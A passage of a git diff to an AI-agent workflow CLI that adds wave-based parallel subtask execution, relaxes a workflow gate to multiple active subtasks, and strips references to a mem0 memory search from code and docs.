+46,11 @@ ] # Safe path prefixes (skip checks for known safe directories) -SAFE_PATH_PREFIXES = ["src/", "lib/", "test/", "tests/", "docs/", "pkg/", "cmd/", "internal/"] +SAFE_PATH_PREFIXES = [ + "src/", "lib/", "test/", "tests/", "docs/", "pkg/", "cmd/", "internal/", + ".claude/agents/", ".claude/commands/", ".claude/hooks/", ".claude/references/", + ".claude/skills/", "scripts/", +] def is_safe_path(path: str) -> bool: diff --git a/src/mapify_cli/templates/hooks/workflow-context-injector.py b/src/mapify_cli/templates/hooks/workflow-context-injector.py index 72145e5..354234f 100755 --- a/src/mapify_cli/templates/hooks/workflow-context-injector.py +++ b/src/mapify_cli/templates/hooks/workflow-context-injector.py @@ -151,7 +151,7 @@ def required_action_for_step(step_id: str, step_phase: str, state: dict) -> str if step_id == "1.56": return "Choose mode (set_execution_mode step_by_step|batch)" if step_id == "2.1": - return "Run mem0 search before Actor" + return "Run context search before Actor (skip if not needed)" if step_id == "2.3": return "Run Actor" if step_id == "2.4": @@ -189,6 +189,17 @@ def format_reminder(state: dict, branch: str) -> str | None: plan_ok = "y" if state.get("plan_approved") else "n" mode = (state.get("execution_mode") or "").strip() or "batch" + # Wave progress display + waves = state.get("execution_waves") or [] + wave_idx = state.get("current_wave_index", 0) + wave_hint = "" + if waves: + wave_hint = f" | WAVE {wave_idx + 1}/{len(waves)}" + current_wave = waves[wave_idx] if wave_idx < len(waves) else [] + if len(current_wave) > 1: + wave_hint += f" ({', '.join(current_wave)})" + mode = "batch:parallel" + required = required_action_for_step(step_id, step_phase, state) diag_hint = "" @@ -204,7 +215,7 @@ def format_reminder(state: dict, branch: str) -> str | None: if not step_id and not step_phase: return None - base = f"[MAP] {step_id} {step_phase} | ST: {subtask_id} ({progress}) | plan:{plan_ok} mode:{mode}{diag_hint}" + base = f"[MAP] {step_id} {step_phase} | ST: {subtask_id} ({progress}) | plan:{plan_ok} mode:{mode}{wave_hint}{diag_hint}" if required: return f"{base} | REQUIRED: {required}" return base diff --git a/src/mapify_cli/templates/hooks/workflow-gate.py b/src/mapify_cli/templates/hooks/workflow-gate.py index a74be23..f403393 100755 --- a/src/mapify_cli/templates/hooks/workflow-gate.py +++ b/src/mapify_cli/templates/hooks/workflow-gate.py @@ -150,13 +150,24 @@ def load_workflow_state(branch: str) -> Optional[Dict]: def check_workflow_compliance(state: Dict) -> tuple[bool, Optional[str]]: """ - Check if current subtask has completed required workflow steps. + Check if current subtask(s) have completed required workflow steps. + + Supports both single-subtask mode (current_subtask) and parallel wave mode + (active_subtasks list). In parallel mode, allows edits if ANY active + subtask has completed the required steps. Returns: (is_compliant, error_message) """ - current_subtask = state.get("current_subtask") - if not current_subtask: + # Try active_subtasks first (parallel wave mode) + active = state.get("active_subtasks", []) + if not active: + # Backward compat: single current_subtask + current = state.get("current_subtask") + if current: + active = [current] + + if not active: current_state = state.get("current_state") or "UNKNOWN" return False, ( "⛔ Workflow Enforcement: No current_subtask defined in workflow_state.json\n\n" @@ -169,26 +180,33 @@ def check_workflow_compliance(state: Dict) -> tuple[bool, Optional[str]]: " - Or delete .map//workflow_state.json to disable enforcement" ) - completed = state.get("completed_steps", {}).get(current_subtask, []) - - missing_steps = [step for step in REQUIRED_STEPS if step not in completed] - - if missing_steps: - pending = state.get("pending_steps", {}).get(current_subtask, []) - return False, ( - f"⛔ Workflow Enforcement: Cannot edit code for {current_subtask}\n\n" - f"Missing required steps: {', '.join(missing_steps)}\n" - f"Completed: {', '.join(completed) if completed else 'none'}\n" - f"Pending: {', '.join(pending) if pending else 'none'}\n\n" - f"Required workflow:\n" - f" 1. Call Task(subagent_type='actor') to generate implementation\n" - f" 2. Call Task(subagent_type='monitor') to validate\n" - f" 3. Only then can you apply changes with Edit/Write\n\n" - f"To fix: Complete missing steps before editing code.\n" - f"Or update workflow_state.json if steps were completed." - ) - - return True, None + # Allow if ANY active subtask has completed required steps + for subtask_id in active: + completed = state.get("completed_steps", {}).get(subtask_id, []) + if all(step in completed for step in REQUIRED_STEPS): + return True, None + + # Block with appropriate message + missing_details = [] + for subtask_id in active: + completed = state.get("completed_steps", {}).get(subtask_id, []) + missing = [step for step in REQUIRED_STEPS if step not in completed] + if missing: + missing_details.append(f"{subtask_id}: missing {', '.join(missing)}") + + return False, ( + f"⛔ Workflow Enforcement: Cannot edit code for active subtasks\n\n" + f"Active subtasks: {', '.join(active)}\n" + f"Missing steps:\n" + + "\n".join(f" - {d}" for d in missing_details) + + "\n\n" + "Required workflow:\n" + " 1. Call Task(subagent_type='actor') to generate implementation\n" + " 2. Call Task(subagent_type='monitor') to validate\n" + " 3. Only then can you apply changes with Edit/Write\n\n" + "To fix: Complete missing steps before editing code.\n" + "Or update workflow_state.json if steps were completed." + ) def main(): diff --git a/src/mapify_cli/templates/map/scripts/map_orchestrator.py b/src/mapify_cli/templates/map/scripts/map_orchestrator.py index 6c7bad6..a67114b 100755 --- a/src/mapify_cli/templates/map/scripts/map_orchestrator.py +++ b/src/mapify_cli/templates/map/scripts/map_orchestrator.py @@ -14,7 +14,7 @@ ┌─────────────────────────────────────────────────────────────┐ │ map-efficient.md (~540 lines) │ │ ├─> 1. Call get_next_step() → returns step instruction │ - │ ├─> 2. Execute step (Actor/Monitor/mem0/etc) │ + │ ├─> 2. Execute step (Actor/Monitor/etc) │ │ ├─> 3. Call validate_step() → checks completion │ │ ├─> 4. If more steps: recurse with fresh context │ │ └─> 5. Else: complete workflow │ @@ -30,9 +30,9 @@ "subtask_index": 0, "subtask_sequence": ["ST-001", "ST-002", "ST-003"], "current_step_id": "2.1", - "current_step_phase": "MEM0_SEARCH", + "current_step_phase": "CONTEXT_SEARCH", "completed_steps": ["1.0_DECOMPOSE", "1.5_INIT_PLAN", "2.0_XML_PACKET"], - "pending_steps": ["2.1_MEM0_SEARCH", "2.3_ACTOR", "2.4_MONITOR", ...] + "pending_steps": ["2.1_CONTEXT_SEARCH", "2.3_ACTOR", "2.4_MONITOR", ...] } STEP PHASES (16 total): @@ -42,7 +42,7 @@ 1.56 CHOOSE_MODE - Choose execution mode (step_by_step|batch) 1.6 INIT_STATE - Create workflow_state.json 2.0 XML_PACKET - Build AI-friendly subtask packet - 2.1 MEM0_SEARCH - Tiered memory search + 2.1 CONTEXT_SEARCH - Context search 2.2 RESEARCH - research-agent (conditional) 2.3 ACTOR - Actor agent implementation 2.4 MONITOR - Monitor validation @@ -107,7 +107,7 @@ "1.56": "CHOOSE_MODE", "1.6": "INIT_STATE", "2.0": "XML_PACKET", - "2.1": "MEM0_SEARCH", + "2.1": "CONTEXT_SEARCH", "2.2": "RESEARCH", "2.3": "ACTOR", "2.4": "MONITOR", @@ -167,6 +167,11 @@ class StepState: max_retries: int = 5 plan_approved: bool = False execution_mode: str = "batch" # batch|step_by_step + # Wave-based parallel execution fields + execution_waves: List[List[str]] = field(default_factory=list) + current_wave_index: int = 0 + subtask_phases: Dict[str, str] = field(default_factory=dict) + subtask_retry_counts: Dict[str, int] = field(default_factory=dict) def to_dict(self) -> dict: """Serialize to dictionary.""" @@ -184,6 +189,10 @@ def to_dict(self) -> dict: "max_retries": self.max_retries, "plan_approved": self.plan_approved, "execution_mode": self.execution_mode, + "execution_waves": self.execution_waves, + "current_wave_index": self.current_wave_index, + "subtask_phases": self.subtask_phases, + "subtask_retry_counts": self.subtask_retry_counts, } @classmethod @@ -203,6 +212,10 @@ def from_dict(cls, data: dict) -> "StepState": max_retries=data.get("max_retries", 5), plan_approved=data.get("plan_approved", False), execution_mode=data.get("execution_mode", "batch"), + execution_waves=data.get("execution_waves", []), + current_wave_index=data.get("current_wave_index", 0), + subtask_phases=data.get("subtask_phases", {}), + subtask_retry_counts=data.get("subtask_retry_counts", {}), ) @classmethod @@ -293,7 +306,7 @@ def get_step_instruction(step_id: str, state: StepState) -> str: "validation_criteria, and test_strategy." ), "2.1": ( - "Call mcp__mem0__map_tiered_search to retrieve relevant patterns. " + "Search for relevant patterns and context. " "Re-rank by relevance and pass top 3 to Actor." ), "2.2": ( @@ -588,6 +601,255 @@ def set_execution_mode(mode: str, branch: str) -> Dict: return {"status": "success", "execution_mode": state.execution_mode} +def set_waves(branch: str, blueprint_path: Optional[str] = None) -> Dict: + """Compute execution waves from blueprint DAG and store in step_state.json. + + Reads the blueprint JSON, builds a DependencyGraph, computes topological + waves, and splits waves by file conflicts. Stores the result in + step_state.execution_waves. + + Args: + branch: Git branch name (sanitized) + blueprint_path: Path to blueprint JSON (default: .map//blueprint.json) + + Returns: + Dict with status and computed waves + """ + # Import here to avoid circular deps at module level + sys_path_added = False + try: + from mapify_cli.dependency_graph import DependencyGraph, SubtaskNode + except ImportError: + # When running as a standalone script inside .map/scripts/, + # dependency_graph.py is not on the path. Try a relative import + # from the repo root (two levels up from .map/scripts/). + import importlib.util + + dg_candidates = [ + Path("src/mapify_cli/dependency_graph.py"), + Path(__file__).resolve().parents[3] / "src" / "mapify_cli" / "dependency_graph.py", + ] + loaded = False + for candidate in dg_candidates: + if candidate.exists(): + spec = importlib.util.spec_from_file_location("dependency_graph", candidate) + if spec and spec.loader: + mod = importlib.util.module_from_spec(spec) + spec.loader.exec_module(mod) + DependencyGraph = mod.DependencyGraph # noqa: N806 + SubtaskNode = mod.SubtaskNode # noqa: N806 + loaded = True + break + if not loaded: + return { + "status": "error", + "message": "Cannot import dependency_graph module", + } + + if blueprint_path is None: + blueprint_path = f".map/{branch}/blueprint.json" + + bp_file = Path(blueprint_path) + if not bp_file.exists(): + return { + "status": "error", + "message": f"Blueprint not found: {blueprint_path}", + } + + try: + blueprint = json.loads(bp_file.read_text(encoding="utf-8")) + except (json.JSONDecodeError, OSError) as exc: + return {"status": "error", "message": f"Invalid blueprint: {exc}"} + + subtasks = blueprint.get("subtasks", []) + if not subtasks: + return {"status": "error", "message": "No subtasks in blueprint"} + + # Build graph + graph = DependencyGraph() + affected_files_map: Dict[str, set] = {} + for st in subtasks: + st_id = st.get("id", "") + deps = st.get("dependencies", []) + graph.add_node(SubtaskNode(id=st_id, dependencies=deps)) + files = st.get("affected_files", []) + affected_files_map[st_id] = set(files) if files else set() + + # Compute waves + raw_waves = graph.compute_waves() + if raw_waves is None: + return {"status": "error", "message": "Cycle detected in dependency graph"} + + # Split each wave by file conflicts + final_waves: List[List[str]] = [] + for wave in raw_waves: + sub_waves = graph.split_wave_by_file_conflicts(wave, affected_files_map) + final_waves.extend(sub_waves) + + # Store in state + state_file = Path(f".map/{branch}/step_state.json") + state = StepState.load(state_file) + state.execution_waves = final_waves + state.current_wave_index = 0 + state.subtask_phases = {} + state.subtask_retry_counts = {} + state.save(state_file) + + return { + "status": "success", + "execution_waves": final_waves, + "wave_count": len(final_waves), + } + + +def get_wave_step(branch: str) -> Dict: + """Get the current wave's subtask batch and per-subtask phases. + + Returns JSON describing what to execute next in wave-based mode. + + Args: + branch: Git branch name (sanitized) + + Returns: + Dict with mode (parallel|sequential), wave_index, subtasks, is_complete + """ + state_file = Path(f".map/{branch}/step_state.json") + state = StepState.load(state_file) + + if not state.execution_waves: + return { + "mode": "sequential", + "wave_index": 0, + "subtasks": [], + "is_complete": True, + "message": "No execution waves configured. Use sequential mode.", + } + + if state.current_wave_index >= len(state.execution_waves): + return { + "mode": "sequential", + "wave_index": state.current_wave_index, + "subtasks": [], + "is_complete": True, + } + + wave = state.execution_waves[state.current_wave_index] + mode = "sequential" if len(wave) == 1 else "parallel" + + # Build subtask info with current phases + subtask_infos = [] + for st_id in wave: + phase = state.subtask_phases.get(st_id, "2.3") + phase_name = STEP_PHASES.get(phase, "ACTOR") + subtask_infos.append({ + "subtask_id": st_id, + "phase": phase_name, + "step_id": phase, + }) + + return { + "mode": mode, + "wave_index": state.current_wave_index, + "wave_total": len(state.execution_waves), + "subtasks": subtask_infos, + "is_complete": False, + } + + +def validate_wave_step(subtask_id: str, step_id: str, branch: str) -> Dict: + """Validate one subtask's step within a wave and advance its phase. + + Args: + subtask_id: Subtask ID (e.g., "ST-002") + step_id: Step ID completed (e.g., "2.3") + branch: Git branch name (sanitized) + + Returns: + Dict with validation result and next phase for this subtask + """ + state_file = Path(f".map/{branch}/step_state.json") + state = StepState.load(state_file) + + # Evidence-gated validation for actor/monitor steps + if step_id in EVIDENCE_REQUIRED: + phase_name, _always_required = EVIDENCE_REQUIRED[step_id] + evidence_dir = Path(f".map/{branch}/evidence") + if evidence_dir.is_dir(): + evidence_file = evidence_dir / f"{phase_name}_{subtask_id}.json" + if not evidence_file.exists(): + return { + "valid": False, + "message": ( + f"Evidence file missing: {evidence_file}. " + f"The {phase_name} agent must write this file." + ), + } + + # Determine next phase for this subtask + subtask_step_order = [s for s in STEP_ORDER if s.startswith("2.")] + current_idx = subtask_step_order.index(step_id) if step_id in subtask_step_order else -1 + + if current_idx >= 0 and current_idx + 1 < len(subtask_step_order): + next_phase = subtask_step_order[current_idx + 1] + else: + next_phase = "COMPLETE" + + state.subtask_phases[subtask_id] = next_phase + state.save(state_file) + + return { + "valid": True, + "message": f"Step {step_id} for {subtask_id} completed", + "next_phase": next_phase, + "subtask_id": subtask_id, + } + + +def advance_wave(branch: str) -> Dict: + """Advance to the next execution wave. + + Called when all subtasks in current wave have passed VERIFY_ADHERENCE. + + Args: + branch: Git branch name (sanitized) + + Returns: + Dict with status and new wave index + """ + state_file = Path(f".map/{branch}/step_state.json") + state = StepState.load(state_file) + + if not state.execution_waves: + return {"status": "error", "message": "No execution waves configured"} + + state.current_wave_index += 1 + # Reset per-subtask phases for the new wave + state.subtask_phases = {} + state.subtask_retry_counts = {} + + is_complete = state.current_wave_index >= len(state.execution_waves) + + # Update subtask_index to track overall progress + if not is_complete: + next_wave = state.execution_waves[state.current_wave_index] + if next_wave: + state.current_subtask_id = next_wave[0] + # Find the index in subtask_sequence + if state.current_subtask_id in state.subtask_sequence: + state.subtask_index = state.subtask_sequence.index( + state.current_subtask_id + ) + + state.save(state_file) + + return { + "status": "success", + "current_wave_index": state.current_wave_index, + "is_complete": is_complete, + "wave_total": len(state.execution_waves), + } + + SKIPPABLE_STEPS = {"2.2", "2.6", "2.11"} @@ -797,6 +1059,10 @@ def main(): "set_subtasks", "resume_from_plan", "check_circuit_breaker", + "set_waves", + "get_wave_step", + "validate_wave_step", + "advance_wave", ], help="Command to execute", ) @@ -807,6 +1073,9 @@ def main(): "extra_args", nargs="*", help="Additional arguments (e.g., more subtask IDs)" ) parser.add_argument("--branch", help="Git branch (auto-detected if omitted)") + parser.add_argument( + "--blueprint", help="Path to blueprint JSON (for set_waves command)" + ) args = parser.parse_args() @@ -889,6 +1158,36 @@ def main(): result = check_circuit_breaker(branch) print(json.dumps(result, indent=2)) + elif args.command == "set_waves": + blueprint_path = args.blueprint or args.task_or_step # --blueprint or positional + result = set_waves(branch, blueprint_path) + print(json.dumps(result, indent=2)) + + elif args.command == "get_wave_step": + result = get_wave_step(branch) + print(json.dumps(result, indent=2)) + + elif args.command == "validate_wave_step": + if not args.task_or_step: + print( + json.dumps({"error": "subtask_id required for validate_wave_step"}), + file=sys.stderr, + ) + sys.exit(1) + extra = args.extra_args or [] + if not extra: + print( + json.dumps({"error": "step_id required as second argument"}), + file=sys.stderr, + ) + sys.exit(1) + result = validate_wave_step(args.task_or_step, extra[0], branch) + print(json.dumps(result, indent=2)) + + elif args.command == "advance_wave": + result = advance_wave(branch) + print(json.dumps(result, indent=2)) + except Exception as e: print(json.dumps({"error": str(e)}), file=sys.stderr) sys.exit(1) diff --git a/src/mapify_cli/templates/map/scripts/map_step_runner.py b/src/mapify_cli/templates/map/scripts/map_step_runner.py index 92e388e..ccae80b 100755 --- a/src/mapify_cli/templates/map/scripts/map_step_runner.py +++ b/src/mapify_cli/templates/map/scripts/map_step_runner.py @@ -116,6 +116,82 @@ def update_workflow_state( return {"status": "error", "message": str(e)} +def update_workflow_state_batch( + updates: List[Dict], + branch: Optional[str] = None, +) -> Dict: + """ + Update workflow_state.json for multiple subtasks in one call. + + Used in wave-based parallel execution to update all subtasks in a wave + after their actors/monitors complete. + + Args: + updates: List of dicts, each with: + - subtask_id: Subtask ID (e.g., "ST-002") + - step_name: Step name (e.g., "actor", "monitor") + - new_state: New state (e.g., "ACTOR_CALLED", "MONITOR_PASSED") + branch: Git branch (auto-detected if None) + + Returns: + Dict with status and per-subtask results + """ + if branch is None: + branch = get_branch_name() + + state_file = Path(f".map/{branch}/workflow_state.json") + + if not state_file.exists(): + return {"status": "error", "message": "workflow_state.json not found"} + + try: + state = json.loads(state_file.read_text(encoding="utf-8")) + + if "completed_steps" not in state: + state["completed_steps"] = {} + + results = [] + active_subtasks = [] + + for update in updates: + subtask_id = update.get("subtask_id", "") + step_name = update.get("step_name", "") + new_state = update.get("new_state", "") + + if subtask_id not in state["completed_steps"]: + state["completed_steps"][subtask_id] = [] + + if step_name not in state["completed_steps"][subtask_id]: + state["completed_steps"][subtask_id].append(step_name) + + active_subtasks.append(subtask_id) + results.append({ + "subtask_id": subtask_id, + "step_name": step_name, + "new_state": new_state, + }) + + # Set active_subtasks list for wave mode (used by workflow-gate.py) + state["active_subtasks"] = active_subtasks + if active_subtasks: + state["current_subtask"] = active_subtasks[0] + state["current_state"] = updates[-1].get("new_state", "UPDATED") + + # Write back atomically + tmp_file = state_file.with_suffix(".tmp") + tmp_file.write_text(json.dumps(state, indent=2), encoding="utf-8") + tmp_file.replace(state_file) + + return { + "status": "success", + "message": f"Batch updated {len(updates)} subtasks", + "results": results, + } + + except (json.JSONDecodeError, OSError) as e: + return {"status": "error", "message": str(e)} + + def update_plan_status( subtask_id: str, new_status: str, @@ -342,7 +418,17 @@ def get_current_phase(branch: Optional[str] = None) -> Optional[str]: func_name = sys.argv[1] - if func_name == "update_workflow_state" and len(sys.argv) >= 5: + if func_name == "update_workflow_state_batch" and len(sys.argv) >= 3: + updates_json = sys.argv[2] + try: + updates = json.loads(updates_json) + except json.JSONDecodeError as e: + print(json.dumps({"status": "error", "message": f"Invalid JSON: {e}"})) + sys.exit(1) + result = update_workflow_state_batch(updates) + print(json.dumps(result, indent=2)) + + elif func_name == "update_workflow_state" and len(sys.argv) >= 5: result = update_workflow_state(sys.argv[2], sys.argv[3], sys.argv[4]) print(json.dumps(result, indent=2)) diff --git a/src/mapify_cli/templates/references/mcp-usage-examples.md b/src/mapify_cli/templates/references/mcp-usage-examples.md index 4f1e42d..e42092a 100644 --- a/src/mapify_cli/templates/references/mcp-usage-examples.md +++ b/src/mapify_cli/templates/references/mcp-usage-examples.md @@ -4,36 +4,9 @@ Reference examples for task-decomposer agent. Loaded on demand for complex decom --- -## mcp__mem0__map_tiered_search Examples - -**Good Example - Decomposing "Add user authentication"**: -``` -Search: "feature implementation authentication" → find past auth implementations -Search: "task decomposition auth flow" → learn typical subtask breakdown -Result: Discover pattern (from tiered search across branch/project/org): - 1. User model (foundation) - 2. Password hashing (depends on user model) - 3. Login/logout endpoints (depends on password hashing) - 4. Session management (depends on endpoints) - 5. Auth middleware (depends on session) - 6. Protected routes (depends on middleware) - -Use this proven order instead of guessing. -``` - -**Bad Example - Decomposing without historical context**: -``` -Jump directly to listing subtasks -→ Miss critical dependency order (e.g., try to implement middleware before session management exists) -→ Overlook edge cases that past implementations revealed -→ Create subtasks that are too coarse or too granular -``` - ---- - ## sequential-thinking for Reasoning Examples -**When to use**: After mem0 search finds similar features +**When to use**: After finding similar features in existing codebase **Key Difference from Pattern Search**: - Pattern search → **Output**: "Here are the 5 subtasks for authentication" @@ -41,7 +14,7 @@ Jump directly to listing subtasks **Example: Decomposing "Add real-time notifications"** -**Step 1 - mcp__mem0__map_tiered_search (WHAT worked)**: +**Step 1 - Search for similar implementations (WHAT worked)**: ``` Query: "feature implementation notifications" Result: Found 3 past implementations with subtask lists: diff --git a/src/mapify_cli/templates/references/step-state-schema.md b/src/mapify_cli/templates/references/step-state-schema.md index 8b5c290..70a52c9 100644 --- a/src/mapify_cli/templates/references/step-state-schema.md +++ b/src/mapify_cli/templates/references/step-state-schema.md @@ -61,8 +61,7 @@ Current step set (linear order; some are conditional): 4. `1.56` CHOOSE_MODE 5. `1.6` INIT_STATE 6. `2.0` XML_PACKET -7. `2.1` MEM0_SEARCH -8. `2.2` RESEARCH (conditional) +7. `2.2` RESEARCH (conditional) 9. `2.3` ACTOR 10. `2.4` MONITOR 11. `2.6` PREDICTOR (conditional) diff --git a/src/mapify_cli/templates/references/workflow-state-schema.md b/src/mapify_cli/templates/references/workflow-state-schema.md index e490808..c7f7695 100644 --- a/src/mapify_cli/templates/references/workflow-state-schema.md +++ b/src/mapify_cli/templates/references/workflow-state-schema.md @@ -47,8 +47,6 @@ INITIALIZED → Workflow started, no subtask active ↓ XML_PACKET_CREATED → AI packet created for current subtask ↓ -CONTEXT_LOADED → mem0 tiered search completed - ↓ RESEARCH_DONE → Research agent completed (if 3+ files) ↓ ACTOR_CALLED → Actor agent generated implementation @@ -73,7 +71,6 @@ WORKFLOW_COMPLETE → All subtasks done, final verification pending Standard step names used in `completed_steps` arrays: - `"xml_packet"` - AI-friendly subtask packet created -- `"mem0_search"` - Context patterns retrieved from mem0 - `"research"` - Research agent analyzed codebase (optional, for 3+ files) - `"actor"` - Actor agent generated implementation - `"monitor"` - Monitor agent validated implementation @@ -109,9 +106,9 @@ Standard step names used in `completed_steps` arrays: "ST-001": ["xml_packet"] }, "pending_steps": { - "ST-001": ["mem0_search", "actor", "monitor", "tests", "linter"], - "ST-002": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"], - "ST-003": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"] + "ST-001": ["actor", "monitor", "tests", "linter"], + "ST-002": ["xml_packet", "actor", "monitor", "tests", "linter"], + "ST-003": ["xml_packet", "actor", "monitor", "tests", "linter"] }, "subtask_sequence": ["ST-001", "ST-002", "ST-003"] } @@ -126,12 +123,12 @@ Standard step names used in `completed_steps` arrays: "current_subtask": "ST-001", "current_state": "MONITOR_PASSED", "completed_steps": { - "ST-001": ["xml_packet", "mem0_search", "actor", "monitor"] + "ST-001": ["xml_packet", "actor", "monitor"] }, "pending_steps": { "ST-001": ["tests", "linter"], - "ST-002": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"], - "ST-003": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"] + "ST-002": ["xml_packet", "actor", "monitor", "tests", "linter"], + "ST-003": ["xml_packet", "actor", "monitor", "tests", "linter"] }, "subtask_sequence": ["ST-001", "ST-002", "ST-003"] } @@ -148,12 +145,12 @@ At this point, workflow-gate.py will **ALLOW** Edit/Write because both "actor" a "current_subtask": "ST-001", "current_state": "SUBTASK_COMPLETE", "completed_steps": { - "ST-001": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"] + "ST-001": ["xml_packet", "actor", "monitor", "tests", "linter"] }, "pending_steps": { "ST-001": [], - "ST-002": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"], - "ST-003": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"] + "ST-002": ["xml_packet", "actor", "monitor", "tests", "linter"], + "ST-003": ["xml_packet", "actor", "monitor", "tests", "linter"] }, "subtask_sequence": ["ST-001", "ST-002", "ST-003"] } diff --git a/src/mapify_cli/templates/skills/map-cli-reference/SKILL.md b/src/mapify_cli/templates/skills/map-cli-reference/SKILL.md index 13ba2b5..2a993c4 100644 --- a/src/mapify_cli/templates/skills/map-cli-reference/SKILL.md +++ b/src/mapify_cli/templates/skills/map-cli-reference/SKILL.md @@ -1,21 +1,18 @@ --- name: map-cli-reference description: >- - Quick reference for mapify CLI and mem0 MCP usage errors. Use when + Quick reference for mapify CLI usage errors. Use when encountering "no such command", "no such option", "parameter not found", - or when user asks "how to use mapify", "mem0 commands", "validate graph". + or when user asks "how to use mapify", "validate graph". Do NOT use for workflow selection (use map-workflows-guide) or planning methodology (use map-planning). metadata: author: azalio version: 3.1.0 - mcp-server: mem0 --- # MAP CLI Quick Reference -> **Note (v4.0+):** Pattern storage and retrieval uses mem0 MCP (tiered namespaces). - Fast lookup for commands, parameters, and common error corrections. **For comprehensive documentation**, see: @@ -26,16 +23,6 @@ Fast lookup for commands, parameters, and common error corrections. ## Quick Command Index -### Pattern Search (mem0 MCP) - -```bash -# Tiered search across namespaces (branch → project → org) -mcp__mem0__map_tiered_search(query="JWT authentication", limit=5) - -# Use section_filter when you know the category -mcp__mem0__map_tiered_search(query="input validation", section_filter="SECURITY_PATTERNS", limit=10) -``` - ### Validate Commands ```bash @@ -75,58 +62,6 @@ mapify upgrade **Solution**: - The `playbook` command was removed in v4.0+ -- For pattern retrieval: use `mcp__mem0__map_tiered_search` -- For pattern writes: use `Task(subagent_type="curator", ...)` - ---- - -### Error 2: MCP Tool Not Available - -**Issue**: mem0 calls return empty results or tool invocation fails. - -**Solution**: -- Verify mem0 MCP is configured and enabled in `.claude/mcp_config.json` (or Claude settings) -- Confirm the org/project/branch namespaces match your workflow conventions - ---- - -### Error 3: Wrong Approach (CRITICAL) - -❌ **WRONG**: Writing patterns directly (ad-hoc scripts / manual storage) - -✅ **CORRECT**: Use Curator agent: - -```bash -Task(subagent_type="curator", ...) -``` - -Curator must: -- Search duplicates first via `mcp__mem0__map_tiered_search` -- Store new patterns via `mcp__mem0__map_add_pattern` -- Archive outdated patterns via `mcp__mem0__map_archive_pattern` - ---- - -## Integration with MAP Workflows (v4.0+) - -### Curator Agent - -**Role**: Stores patterns in mem0 MCP - -**Workflow**: -1. Curator analyzes reflector insights -2. Checks for duplicates via `mcp__mem0__map_tiered_search` -3. Stores new patterns via `mcp__mem0__map_add_pattern` -4. Archives outdated patterns via `mcp__mem0__map_archive_pattern` - -### Reflector Agent - -**Role**: Searches for existing patterns before extracting new ones - -**MCP tool used**: -```bash -mcp__mem0__map_tiered_search(query="error handling", limit=5) -``` --- @@ -156,10 +91,9 @@ mcp__mem0__map_tiered_search(query="error handling", limit=5) **Actions:** 1. Identify error type — removed command usage -2. Explain: `playbook` command was removed in v4.0+, replaced by mem0 MCP -3. Provide replacement: `mcp__mem0__map_tiered_search` for reads, `Task(subagent_type="curator", ...)` for writes +2. Explain: `playbook` command was removed in v4.0+ -**Result:** User switches to mem0 MCP tools, error resolved. +**Result:** User acknowledges the removed command. ### Example 2: Validating a dependency graph @@ -172,28 +106,15 @@ mcp__mem0__map_tiered_search(query="error handling", limit=5) **Result:** User validates their task plan and fixes dependency issues before running workflow. -### Example 3: mem0 MCP not responding - -**User says:** "mem0 tiered search returns empty results" - -**Actions:** -1. Check mem0 MCP configuration in `.claude/mcp_config.json` -2. Verify namespace conventions (org/project/branch) -3. Test with broad query: `mcp__mem0__map_tiered_search(query="test", limit=1)` - -**Result:** User identifies configuration issue and restores mem0 connectivity. - --- ## Troubleshooting | Issue | Cause | Solution | |-------|-------|----------| -| `No such command 'playbook'` | Removed in v4.0+ | Use `mcp__mem0__map_tiered_search` for pattern retrieval | +| `No such command 'playbook'` | Removed in v4.0+ | Command no longer available | | `No such option '--output'` | Wrong subcommand syntax | Check `mapify --help` for valid options | -| mem0 tool invocation fails | MCP server not configured | Add mem0 to `.claude/mcp_config.json` and restart | | `validate graph` exit code 2 | Malformed JSON input | Validate JSON with `python -m json.tool < file.json` | -| Patterns not persisting | Writing directly instead of via Curator | Always use `Task(subagent_type="curator", ...)` for pattern writes | | `mapify init` overwrites files | Using `--force` flag | Omit `--force` to preserve existing configuration | --- diff --git a/src/mapify_cli/templates/skills/map-cli-reference/scripts/check-command.sh b/src/mapify_cli/templates/skills/map-cli-reference/scripts/check-command.sh index 216c959..f7efaa4 100755 --- a/src/mapify_cli/templates/skills/map-cli-reference/scripts/check-command.sh +++ b/src/mapify_cli/templates/skills/map-cli-reference/scripts/check-command.sh @@ -31,11 +31,11 @@ if [ -z "$SUBCOMMAND" ]; then echo " validate - Validate dependency graphs" echo "" echo "Removed subcommands:" - echo " playbook - Removed in v4.0+ (use mem0 MCP)" + echo " playbook - Removed in v4.0+" exit 1 fi -# Removed subcommands (replaced by mem0 MCP in v4.0+) +# Removed subcommands REMOVED_COMMANDS="playbook" # Known valid commands @@ -44,16 +44,7 @@ VALID_COMMANDS="init check upgrade validate" # Check removed commands first for dep in $REMOVED_COMMANDS; do if [ "$SUBCOMMAND" = "$dep" ]; then - echo "ERROR: '$SUBCOMMAND' was removed in v4.0+ (use mem0 MCP instead)" - echo "" - echo "Replacements:" - case "$SUBCOMMAND" in - playbook) - echo " Pattern retrieval: mcp__mem0__map_tiered_search(query=\"...\", limit=5)" - echo " Pattern storage: Task(subagent_type=\"curator\", ...)" - echo " Pattern archival: mcp__mem0__map_archive_pattern(...)" - ;; - esac + echo "ERROR: '$SUBCOMMAND' was removed in v4.0+" exit 2 fi done diff --git a/src/mapify_cli/templates/skills/map-workflows-guide/SKILL.md b/src/mapify_cli/templates/skills/map-workflows-guide/SKILL.md index 6e5a1e5..5ad77c2 100644 --- a/src/mapify_cli/templates/skills/map-workflows-guide/SKILL.md +++ b/src/mapify_cli/templates/skills/map-workflows-guide/SKILL.md @@ -11,7 +11,6 @@ version: 1.0 metadata: author: azalio version: 3.1.0 - mcp-server: mem0 --- # MAP Workflows Guide @@ -79,14 +78,12 @@ Answer these 5 questions to find your workflow: - ✅ Basic validation (Monitor checks correctness) - ❌ NO quality scoring (Evaluator skipped) - ❌ NO impact analysis (Predictor skipped entirely) -- ❌ NO learning (Reflector/Curator skipped) +- ❌ NO learning (Reflector skipped) **Trade-offs:** - Saves 50-60% tokens vs full pipeline (every agent per subtask) -- mem0 never improves (no patterns stored) - Knowledge never accumulates - Minimal quality gates (only basic checks) -- Cannot reuse learned patterns in future tasks **Example tasks:** - "Fix a small validation edge case" @@ -121,11 +118,11 @@ Answer these 5 questions to find your workflow: 